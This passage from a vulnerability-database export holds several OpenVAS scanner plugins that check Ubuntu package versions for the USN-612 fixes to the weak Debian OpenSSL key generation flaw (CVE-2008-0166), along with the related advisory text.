Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"USN-612-2 introduced protections for OpenSSH, related to the OpenSSL\n vulnerabilities addressed by USN-612-1. This update provides the\n corresponding updates for OpenSSH in Ubuntu 6.06 LTS. While the OpenSSL\n in Ubuntu 6.06 is not vulnerable, this update will block weak keys\n generated on systems that may have been affected themselves.\n\n Original advisory details:\n \n A weakness has been discovered in the random number generator used\n by OpenSSL on Debian and Ubuntu systems. As a result of this\n weakness, certain encryption keys are much more common than they\n should be, such that an attacker could guess the key through a\n brute-force attack given minimal knowledge of the system. This\n particularly affects the use of encryption keys in OpenSSH, OpenVPN\n and SSL certificates.\";\n\ntag_summary = \"Ubuntu Update for Linux kernel vulnerabilities USN-612-7\";\ntag_affected = \"openssh update on Ubuntu 6.06 LTS\";\ntag_solution = \"Please Install the Updated Packages.\";\n\n\n\nif(description)\n{\n script_xref(name: \"URL\" , value: \"http://www.ubuntu.com/usn/usn-612-7/\");\n script_id(840268);\n script_version(\"$Revision: 7969 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-12-01 10:23:16 +0100 (Fri, 01 Dec 2017) $\");\n script_tag(name:\"creation_date\", value:\"2009-03-23 10:59:50 +0100 (Mon, 23 Mar 2009)\");\n script_tag(name:\"cvss_base\", value:\"7.8\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:N/A:N\");\n script_xref(name: \"USN\", value: \"612-7\");\n script_cve_id(\"CVE-2008-0166\");\n script_name( \"Ubuntu Update for openssh update USN-612-7\");\n\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2009 Greenbone Networks GmbH\");\n script_family(\"Ubuntu Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/ubuntu_linux\", \"ssh/login/packages\");\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n\ninclude(\"pkg-lib-deb.inc\");\n\nrelease = get_kb_item(\"ssh/login/release\");\n\n\nres = \"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == \"UBUNTU6.06 LTS\")\n{\n\n if ((res = isdpkgvuln(pkg:\"openssh-client\", ver:\"4.2p1-7ubuntu3.4\", rls:\"UBUNTU6.06 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"openssh-server\", ver:\"4.2p1-7ubuntu3.4\", rls:\"UBUNTU6.06 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"ssh-askpass-gnome\", ver:\"4.2p1-7ubuntu3.4\", rls:\"UBUNTU6.06 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"ssh\", ver:\"4.2p1-7ubuntu3.4\", rls:\"UBUNTU6.06 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n", "cvss": {"score": 7.8, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:NONE/A:NONE/"}}, {"lastseen": "2018-04-06T11:16:13", "bulletinFamily": "scanner", "description": "The remote host is probably affected by the vulnerabilities described in\nUSN-612-1,USN-612-2,USN-612-3,USN-612-4: OpenSSL vulnerability\n\nLuciano Bello discovered that the random number generator in Debian's\nopenssl package is predictable. This is caused by an incorrect\nDebian-specific change to the openssl package (CVE-2008-0166). As a\nresult, cryptographic key material may be guessable.\n\nThis is a Debian-specific vulnerability which does not affect other\noperating systems which are not based on Debian. However, other systems\ncan be indirectly affected if weak keys are imported into them.\n\nIt is strongly recommended that all cryptographic key material which has\nbeen generated by OpenSSL versions starting with 0.9.8c-1 on Debian\nsystems is recreated from scratch. Furthermore, all DSA keys ever used\non affected Debian systems for signing or authentication purposes should\nbe considered compromised; the Digital Signature Algorithm relies on a\nsecret random value used during signature generation.\n\nThe first vulnerable version, 0.9.8c-1, was uploaded to the unstable\ndistribution on 2006-09-17, and has since propagated to the testing and\ncurrent stable (etch) distributions. The old stable distribution\n(sarge) is not affected.\n\nAffected keys include SSH keys, OpenVPN keys, DNSSEC keys, and key\nmaterial for use in X.509 certificates and session keys used in SSL/TLS\nconnections. Keys generated with GnuPG or GNUTLS are not affected,\nthough.\n\nThe problem can be corrected by upgrading your system to the actual\npackages.", "modified": "2018-04-06T00:00:00", "published": "2008-09-04T00:00:00", "href": "http://plugins.openvas.org/nasl.php?oid=136141256231090025", "id": "OPENVAS:136141256231090025", "title": "USN-612-1 through USN-612-11: OpenSSL vulnerability (openssl)", "type": "openvas", "sourceData": "# Carsten Koch-Mauthe <c.koch-mauthe at dn-systems.de>\n#\n# based on deb_1571_1.nasl by Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (C) 2008 Greenbone Networks GmbH\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n# $Revision: 9349 $\n\ninclude(\"revisions-lib.inc\");\ntag_summary = \"The remote host is probably affected by the vulnerabilities described in\nUSN-612-1,USN-612-2,USN-612-3,USN-612-4: OpenSSL vulnerability\n\nLuciano Bello discovered that the random number generator in Debian's\nopenssl package is predictable. This is caused by an incorrect\nDebian-specific change to the openssl package (CVE-2008-0166). As a\nresult, cryptographic key material may be guessable.\n\nThis is a Debian-specific vulnerability which does not affect other\noperating systems which are not based on Debian. However, other systems\ncan be indirectly affected if weak keys are imported into them.\n\nIt is strongly recommended that all cryptographic key material which has\nbeen generated by OpenSSL versions starting with 0.9.8c-1 on Debian\nsystems is recreated from scratch. Furthermore, all DSA keys ever used\non affected Debian systems for signing or authentication purposes should\nbe considered compromised; the Digital Signature Algorithm relies on a\nsecret random value used during signature generation.\n\nThe first vulnerable version, 0.9.8c-1, was uploaded to the unstable\ndistribution on 2006-09-17, and has since propagated to the testing and\ncurrent stable (etch) distributions. The old stable distribution\n(sarge) is not affected.\n\nAffected keys include SSH keys, OpenVPN keys, DNSSEC keys, and key\nmaterial for use in X.509 certificates and session keys used in SSL/TLS\nconnections. Keys generated with GnuPG or GNUTLS are not affected,\nthough.\n\nThe problem can be corrected by upgrading your system to the actual\npackages.\";\n\ntag_solution = \"http://www.ubuntu.com/usn/usn-612-1\nhttp://www.ubuntu.com/usn/usn-612-2\nhttp://www.ubuntu.com/usn/usn-612-3\nhttp://www.ubuntu.com/usn/usn-612-4\nhttp://www.ubuntu.com/usn/usn-612-5\nhttp://www.ubuntu.com/usn/usn-612-6\nhttp://www.ubuntu.com/usn/usn-612-7\nhttp://www.ubuntu.com/usn/usn-612-8\nhttp://www.ubuntu.com/usn/usn-612-9\nhttp://www.ubuntu.com/usn/usn-612-10\nhttp://www.ubuntu.com/usn/usn-612-11\";\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.90025\");\n script_version(\"$Revision: 9349 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-04-06 09:02:25 +0200 (Fri, 06 Apr 2018) $\");\n script_tag(name:\"creation_date\", value:\"2008-09-04 22:29:05 +0200 (Thu, 04 Sep 2008)\");\n script_cve_id(\"CVE-2008-0166\");\n script_tag(name:\"cvss_base\", value:\"7.8\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:N/A:N\");\n script_name(\"USN-612-1 through USN-612-11: OpenSSL vulnerability (openssl)\");\n\n\n script_copyright(\"Copyright (C) 2008 Greenbone Networks GmbH\");\n\n script_category(ACT_GATHER_INFO);\n script_xref(name: \"URL\" , value: \"http://www.ubuntu.com/usn/usn-612-1/\");\n\n script_family(\"Ubuntu Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/ubuntu_linux\", \"ssh/login/packages\");\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n#\n# The script code starts here\n#\n\ninclude(\"pkg-lib-deb.inc\");\n\n report = \"\";\n res = \"\";\n\n kbrls = get_kb_item(\"ssh/login/release\");\n rls = NULL;\n ver = NULL;\n rel = NULL;\n pkg = NULL;\n rls[0] = \"UBUNTU6.06\";\n ver[0] = \"0.3.3+0.4-0ubuntu0.6.06.2\";\n pkg[0] = \"openssl-blacklist\";\n rls[1] = \"UBUNTU6.06\";\n ver[1] = \"0.3.3+0.4-0ubuntu0.6.06.2\";\n pkg[1] = \"openssl-blacklist-extra\";\n rls[2] = \"UBUNTU6.06\";\n ver[2] = \"1:4.2p1-7ubuntu3.4\";\n pkg[2] = \"openssh-server\";\n rls[3] = \"UBUNTU6.06\";\n ver[3] = \"0.1-0ubuntu0.6.06.1\";\n pkg[3] = \"openssl-blacklist\";\n rls[4] = \"UBUNTU7.04\";\n ver[4] = \"0.1-0ubuntu0.6.06.1\";\n pkg[4] = \"libssl0.9.8\";\n rls[5] = \"UBUNTU7.04\";\n ver[5] = \"1:4.3p2-8ubuntu1.3\";\n pkg[5] = \"openssh-server\";\n rls[6] = \"UBUNTU7.04\";\n ver[6] = \"1.0.13-0ubuntu0.7.04.1\";\n pkg[6] = \"ssl-cert\";\n rls[7] = \"UBUNTU7.04\";\n ver[7] = \"1:4.3p2-8ubuntu1.4\";\n pkg[7] = \"openssh-client\";\n rls[8] = \"UBUNTU7.04\";\n ver[8] = \"1:4.3p2-8ubuntu1.4\";\n pkg[8] = \"openssh-client-udeb\";\n rls[9] = \"UBUNTU7.04\";\n ver[9] = \"2.0.9-5ubuntu0.3\";\n pkg[9] = \"openvpn\";\n rls[10] = \"UBUNTU7.04\";\n ver[10] = \"0.3.3+0.4-0ubuntu0.7.04.2\";\n pkg[10] = \"openssl-blacklist\";\n rls[11] = \"UBUNTU7.04\";\n ver[11] = \"0.3.3+0.4-0ubuntu0.7.04.2\";\n pkg[11] = \"openssl-blacklist-extra\";\n rls[12] = \"UBUNTU7.10\";\n ver[12] = \"0.9.8e-5ubuntu3.2\";\n pkg[12] = \"libssl0.9.8\";\n rls[13] = \"UBUNTU7.10\";\n ver[13] = \"1:4.6p1-5ubuntu0.3\";\n pkg[13] = \"openssh-server\";\n rls[14] = \"UBUNTU7.10\";\n ver[14] = \"1.0.14-0ubuntu0.7.10.1\";\n pkg[14] = \"ssl-cert\";\n rls[15] = \"UBUNTU7.10\";\n ver[15] = \"1:4.6p1-5ubuntu0.5\";\n pkg[15] = \"openssh-client\";\n rls[16] = \"UBUNTU7.10\";\n ver[16] = \"1:4.6p1-5ubuntu0.5\";\n pkg[16] = \"openssh-client-udeb\";\n rls[17] = \"UBUNTU7.10\";\n ver[17] = \"2.0.9-8ubuntu0.3\";\n pkg[17] = \"openvpn\";\n rls[18] = \"UBUNTU7.10\";\n ver[18] = \"0.3.3+0.4-0ubuntu0.7.10.2\";\n pkg[18] = \"openssl-blacklist\";\n rls[19] = \"UBUNTU7.10\";\n ver[19] = \"0.3.3+0.4-0ubuntu0.7.10.2\";\n pkg[19] = \"openssl-blacklist-extra\";\n rls[20] = \"UBUNTU8.04\";\n ver[20] = \"0.9.8g-4ubuntu3.1\";\n pkg[20] = \"libssl0.9.8\";\n rls[21] = \"UBUNTU8.04\";\n ver[21] = \"1:4.7p1-8ubuntu1.1\";\n pkg[21] = \"openssh-server\";\n rls[22] = \"UBUNTU8.04\";\n ver[22] = \"1.0.14-0ubuntu2.1\";\n pkg[22] = \"ssl-cert\";\n rls[23] = \"UBUNTU8.04\";\n ver[23] = \"1:4.7p1-8ubuntu1.2\";\n pkg[23] = \"openssh-client\";\n rls[24] = \"UBUNTU8.04\";\n ver[24] = \"1:4.7p1-8ubuntu1.2\";\n pkg[24] = \"openssh-client-udeb\";\n rls[25] = \"UBUNTU8.04\";\n ver[25] = \"2.1~rc7-1ubuntu3.3\";\n pkg[25] = \"openvpn\";\n rls[26] = \"UBUNTU8.04\";\n ver[26] = \"0.3.3+0.4-0ubuntu0.8.04.3\";\n pkg[26] = \"openssl-blacklist\";\n rls[27] = \"UBUNTU8.04\";\n ver[27] = \"0.3.3+0.4-0ubuntu0.8.04.3\";\n pkg[27] = \"openssl-blacklist-extra\";\n foreach i (keys(rls)) {\n if( kbrls == rls[i] ) {\n if((res = isdpkgvuln(pkg:pkg[i], ver:ver[i], rls:rls[i])) != NULL) {\n report += res;\n }\n }\n }\n\nif(report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 7.8, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:NONE/A:NONE/"}}, {"lastseen": "2017-12-04T11:19:21", "bulletinFamily": "scanner", "description": "The remote host is probably affected by the vulnerabilities described in\nUSN-612-1,USN-612-2,USN-612-3,USN-612-4: OpenSSL vulnerability\n\nLuciano Bello discovered that the random number generator in Debian's\nopenssl package is predictable. This is caused by an incorrect\nDebian-specific change to the openssl package (CVE-2008-0166). As a\nresult, cryptographic key material may be guessable.\n\nThis is a Debian-specific vulnerability which does not affect other\noperating systems which are not based on Debian. However, other systems\ncan be indirectly affected if weak keys are imported into them.\n\nIt is strongly recommended that all cryptographic key material which has\nbeen generated by OpenSSL versions starting with 0.9.8c-1 on Debian\nsystems is recreated from scratch. Furthermore, all DSA keys ever used\non affected Debian systems for signing or authentication purposes should\nbe considered compromised; the Digital Signature Algorithm relies on a\nsecret random value used during signature generation.\n\nThe first vulnerable version, 0.9.8c-1, was uploaded to the unstable\ndistribution on 2006-09-17, and has since propagated to the testing and\ncurrent stable (etch) distributions. The old stable distribution\n(sarge) is not affected.\n\nAffected keys include SSH keys, OpenVPN keys, DNSSEC keys, and key\nmaterial for use in X.509 certificates and session keys used in SSL/TLS\nconnections. Keys generated with GnuPG or GNUTLS are not affected,\nthough.\n\nThe problem can be corrected by upgrading your system to the actual\npackages.", "modified": "2017-12-01T00:00:00", "published": "2008-09-04T00:00:00", "href": "http://plugins.openvas.org/nasl.php?oid=90025", "id": "OPENVAS:90025", "title": "USN-612-1 through USN-612-11: OpenSSL vulnerability (openssl)", "type": "openvas", "sourceData": "# Carsten Koch-Mauthe <c.koch-mauthe at dn-systems.de>\n#\n# based on deb_1571_1.nasl by Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (C) 2008 Greenbone Networks GmbH\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n# $Revision: 7969 $\n\ninclude(\"revisions-lib.inc\");\ntag_summary = \"The remote host is probably affected by the vulnerabilities described in\nUSN-612-1,USN-612-2,USN-612-3,USN-612-4: OpenSSL vulnerability\n\nLuciano Bello discovered that the random number generator in Debian's\nopenssl package is predictable. This is caused by an incorrect\nDebian-specific change to the openssl package (CVE-2008-0166). As a\nresult, cryptographic key material may be guessable.\n\nThis is a Debian-specific vulnerability which does not affect other\noperating systems which are not based on Debian. However, other systems\ncan be indirectly affected if weak keys are imported into them.\n\nIt is strongly recommended that all cryptographic key material which has\nbeen generated by OpenSSL versions starting with 0.9.8c-1 on Debian\nsystems is recreated from scratch. Furthermore, all DSA keys ever used\non affected Debian systems for signing or authentication purposes should\nbe considered compromised; the Digital Signature Algorithm relies on a\nsecret random value used during signature generation.\n\nThe first vulnerable version, 0.9.8c-1, was uploaded to the unstable\ndistribution on 2006-09-17, and has since propagated to the testing and\ncurrent stable (etch) distributions. The old stable distribution\n(sarge) is not affected.\n\nAffected keys include SSH keys, OpenVPN keys, DNSSEC keys, and key\nmaterial for use in X.509 certificates and session keys used in SSL/TLS\nconnections. Keys generated with GnuPG or GNUTLS are not affected,\nthough.\n\nThe problem can be corrected by upgrading your system to the actual\npackages.\";\n\ntag_solution = \"http://www.ubuntu.com/usn/usn-612-1\nhttp://www.ubuntu.com/usn/usn-612-2\nhttp://www.ubuntu.com/usn/usn-612-3\nhttp://www.ubuntu.com/usn/usn-612-4\nhttp://www.ubuntu.com/usn/usn-612-5\nhttp://www.ubuntu.com/usn/usn-612-6\nhttp://www.ubuntu.com/usn/usn-612-7\nhttp://www.ubuntu.com/usn/usn-612-8\nhttp://www.ubuntu.com/usn/usn-612-9\nhttp://www.ubuntu.com/usn/usn-612-10\nhttp://www.ubuntu.com/usn/usn-612-11\";\n\nif(description)\n{\n script_id(90025);\n script_version(\"$Revision: 7969 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-12-01 10:23:16 +0100 (Fri, 01 Dec 2017) $\");\n script_tag(name:\"creation_date\", value:\"2008-09-04 22:29:05 +0200 (Thu, 04 Sep 2008)\");\n script_cve_id(\"CVE-2008-0166\");\n script_tag(name:\"cvss_base\", value:\"7.8\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:N/A:N\");\n script_name(\"USN-612-1 through USN-612-11: OpenSSL vulnerability (openssl)\");\n\n\n script_copyright(\"Copyright (C) 2008 Greenbone Networks GmbH\");\n\n script_category(ACT_GATHER_INFO);\n script_xref(name: \"URL\" , value: \"http://www.ubuntu.com/usn/usn-612-1/\");\n\n script_family(\"Ubuntu Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/ubuntu_linux\", \"ssh/login/packages\");\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n#\n# The script code starts here\n#\n\ninclude(\"pkg-lib-deb.inc\");\n\n report = \"\";\n res = \"\";\n\n kbrls = get_kb_item(\"ssh/login/release\");\n rls = NULL;\n ver = NULL;\n rel = NULL;\n pkg = NULL;\n rls[0] = \"UBUNTU6.06\";\n ver[0] = \"0.3.3+0.4-0ubuntu0.6.06.2\";\n pkg[0] = \"openssl-blacklist\";\n rls[1] = \"UBUNTU6.06\";\n ver[1] = \"0.3.3+0.4-0ubuntu0.6.06.2\";\n pkg[1] = \"openssl-blacklist-extra\";\n rls[2] = \"UBUNTU6.06\";\n ver[2] = \"1:4.2p1-7ubuntu3.4\";\n pkg[2] = \"openssh-server\";\n rls[3] = \"UBUNTU6.06\";\n ver[3] = \"0.1-0ubuntu0.6.06.1\";\n pkg[3] = \"openssl-blacklist\";\n rls[4] = \"UBUNTU7.04\";\n ver[4] = \"0.1-0ubuntu0.6.06.1\";\n pkg[4] = \"libssl0.9.8\";\n rls[5] = \"UBUNTU7.04\";\n ver[5] = \"1:4.3p2-8ubuntu1.3\";\n pkg[5] = \"openssh-server\";\n rls[6] = \"UBUNTU7.04\";\n ver[6] = \"1.0.13-0ubuntu0.7.04.1\";\n pkg[6] = \"ssl-cert\";\n rls[7] = \"UBUNTU7.04\";\n ver[7] = \"1:4.3p2-8ubuntu1.4\";\n pkg[7] = \"openssh-client\";\n rls[8] = \"UBUNTU7.04\";\n ver[8] = \"1:4.3p2-8ubuntu1.4\";\n pkg[8] = \"openssh-client-udeb\";\n rls[9] = \"UBUNTU7.04\";\n ver[9] = \"2.0.9-5ubuntu0.3\";\n pkg[9] = \"openvpn\";\n rls[10] = \"UBUNTU7.04\";\n ver[10] = \"0.3.3+0.4-0ubuntu0.7.04.2\";\n pkg[10] = \"openssl-blacklist\";\n rls[11] = \"UBUNTU7.04\";\n ver[11] = \"0.3.3+0.4-0ubuntu0.7.04.2\";\n pkg[11] = \"openssl-blacklist-extra\";\n rls[12] = \"UBUNTU7.10\";\n ver[12] = \"0.9.8e-5ubuntu3.2\";\n pkg[12] = \"libssl0.9.8\";\n rls[13] = \"UBUNTU7.10\";\n ver[13] = \"1:4.6p1-5ubuntu0.3\";\n pkg[13] = \"openssh-server\";\n rls[14] = \"UBUNTU7.10\";\n ver[14] = \"1.0.14-0ubuntu0.7.10.1\";\n pkg[14] = \"ssl-cert\";\n rls[15] = \"UBUNTU7.10\";\n ver[15] = \"1:4.6p1-5ubuntu0.5\";\n pkg[15] = \"openssh-client\";\n rls[16] = \"UBUNTU7.10\";\n ver[16] = \"1:4.6p1-5ubuntu0.5\";\n pkg[16] = \"openssh-client-udeb\";\n rls[17] = \"UBUNTU7.10\";\n ver[17] = \"2.0.9-8ubuntu0.3\";\n pkg[17] = \"openvpn\";\n rls[18] = \"UBUNTU7.10\";\n ver[18] = \"0.3.3+0.4-0ubuntu0.7.10.2\";\n pkg[18] = \"openssl-blacklist\";\n rls[19] = \"UBUNTU7.10\";\n ver[19] = \"0.3.3+0.4-0ubuntu0.7.10.2\";\n pkg[19] = \"openssl-blacklist-extra\";\n rls[20] = \"UBUNTU8.04\";\n ver[20] = \"0.9.8g-4ubuntu3.1\";\n pkg[20] = \"libssl0.9.8\";\n rls[21] = \"UBUNTU8.04\";\n ver[21] = \"1:4.7p1-8ubuntu1.1\";\n pkg[21] = \"openssh-server\";\n rls[22] = \"UBUNTU8.04\";\n ver[22] = \"1.0.14-0ubuntu2.1\";\n pkg[22] = \"ssl-cert\";\n rls[23] = \"UBUNTU8.04\";\n ver[23] = \"1:4.7p1-8ubuntu1.2\";\n pkg[23] = \"openssh-client\";\n rls[24] = \"UBUNTU8.04\";\n ver[24] = \"1:4.7p1-8ubuntu1.2\";\n pkg[24] = \"openssh-client-udeb\";\n rls[25] = \"UBUNTU8.04\";\n ver[25] = \"2.1~rc7-1ubuntu3.3\";\n pkg[25] = \"openvpn\";\n rls[26] = \"UBUNTU8.04\";\n ver[26] = \"0.3.3+0.4-0ubuntu0.8.04.3\";\n pkg[26] = \"openssl-blacklist\";\n rls[27] = \"UBUNTU8.04\";\n ver[27] = \"0.3.3+0.4-0ubuntu0.8.04.3\";\n pkg[27] = \"openssl-blacklist-extra\";\n foreach i (keys(rls)) {\n if( kbrls == rls[i] ) {\n if((res = isdpkgvuln(pkg:pkg[i], ver:ver[i], rls:rls[i])) != NULL) {\n report += res;\n }\n }\n }\n\nif(report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 7.8, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:NONE/A:NONE/"}}, {"lastseen": "2017-12-04T11:29:37", "bulletinFamily": "scanner", "description": "Ubuntu Update for Linux kernel vulnerabilities USN-612-4", "modified": "2017-12-01T00:00:00", "published": "2009-03-23T00:00:00", "href": "http://plugins.openvas.org/nasl.php?oid=840338", "id": "OPENVAS:840338", "title": "Ubuntu Update for ssl-cert vulnerability USN-612-4", "type": "openvas", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_ubuntu_USN_612_4.nasl 7969 2017-12-01 09:23:16Z santu $\n#\n# Ubuntu Update for ssl-cert vulnerability USN-612-4\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2009 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"USN-612-1 fixed vulnerabilities in openssl. This update provides the\n corresponding updates for ssl-cert -- potentially compromised snake-oil\n SSL certificates will be regenerated.\n\n Original advisory details:\n \n A weakness has been discovered in the random number generator used\n by OpenSSL on Debian and Ubuntu systems. As a result of this\n weakness, certain encryption keys are much more common than they\n should be, such that an attacker could guess the key through a\n brute-force attack given minimal knowledge of the system. This\n particularly affects the use of encryption keys in OpenSSH, OpenVPN\n and SSL certificates.\n \n This vulnerability only affects operating systems which (like\n Ubuntu) are based on Debian. However, other systems can be\n indirectly affected if weak keys are imported into them.\n \n We consider this an extremely serious vulnerability, and urge all\n users to act immediately to secure their systems. (CVE-2008-0166)\n \n == Who is affected ==\n \n Systems which are running any of the following releases:\n \n * Ubuntu 7.04 (Feisty)\n * Ubuntu 7.10 (Gutsy)\n * Ubuntu 8.04 LTS (Hardy)\n * Ubuntu "Intrepid Ibex" (development): libssl <= 0.9.8g-8\n * Debian 4.0 (etch) (see corresponding Debian security advisory)\n \n and have openssh-server installed or have been used to create an\n OpenSSH key or X.509 (SSL) certificate.\n \n All OpenSSH and X.509 keys generated on such systems must be\n considered untrustworthy, regardless of the system on which they\n are used, even after the update has been applied.\n \n This includes the automatically generated host keys used by OpenSSH,\n which are the basis for its server spoofing and man-in-the-middle\n protection.\";\n\ntag_summary = \"Ubuntu Update for Linux kernel vulnerabilities USN-612-4\";\ntag_affected = \"ssl-cert vulnerability on Ubuntu 7.04 ,\n Ubuntu 7.10 ,\n Ubuntu 8.04 LTS\";\ntag_solution = \"Please Install the Updated Packages.\";\n\n\n\nif(description)\n{\n script_xref(name: \"URL\" , value: \"http://www.ubuntu.com/usn/usn-612-4/\");\n script_id(840338);\n script_version(\"$Revision: 7969 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-12-01 10:23:16 +0100 (Fri, 01 Dec 2017) $\");\n script_tag(name:\"creation_date\", value:\"2009-03-23 10:59:50 +0100 (Mon, 23 Mar 2009)\");\n script_tag(name:\"cvss_base\", value:\"7.8\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:N/A:N\");\n script_xref(name: \"USN\", value: \"612-4\");\n script_cve_id(\"CVE-2008-0166\");\n script_name( \"Ubuntu Update for ssl-cert vulnerability USN-612-4\");\n\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2009 Greenbone Networks GmbH\");\n script_family(\"Ubuntu Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/ubuntu_linux\", \"ssh/login/packages\");\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n\ninclude(\"pkg-lib-deb.inc\");\n\nrelease = get_kb_item(\"ssh/login/release\");\n\n\nres = \"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == \"UBUNTU7.04\")\n{\n\n if ((res = isdpkgvuln(pkg:\"ssl-cert\", ver:\"1.0.13-0ubuntu0.7.04.1\", rls:\"UBUNTU7.04\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n\n\nif(release == \"UBUNTU8.04 LTS\")\n{\n\n if ((res = isdpkgvuln(pkg:\"ssl-cert\", ver:\"1.0.14-0ubuntu2.1\", rls:\"UBUNTU8.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n\n\nif(release == \"UBUNTU7.10\")\n{\n\n if ((res = isdpkgvuln(pkg:\"ssl-cert\", ver:\"1.0.14-0ubuntu0.7.10.1\", rls:\"UBUNTU7.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n", "cvss": {"score": 7.8, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:NONE/A:NONE/"}}, {"lastseen": "2017-12-04T11:29:18", "bulletinFamily": "scanner", "description": "Ubuntu Update for Linux kernel vulnerabilities USN-612-3", "modified": "2017-12-01T00:00:00", "published": "2009-03-23T00:00:00", "href": "http://plugins.openvas.org/nasl.php?oid=840286", "id": "OPENVAS:840286", "title": "Ubuntu Update for openvpn vulnerability USN-612-3", "type": "openvas", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_ubuntu_USN_612_3.nasl 7969 2017-12-01 09:23:16Z santu $\n#\n# Ubuntu Update for openvpn vulnerability USN-612-3\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2009 Greenbone Networks GmbH, 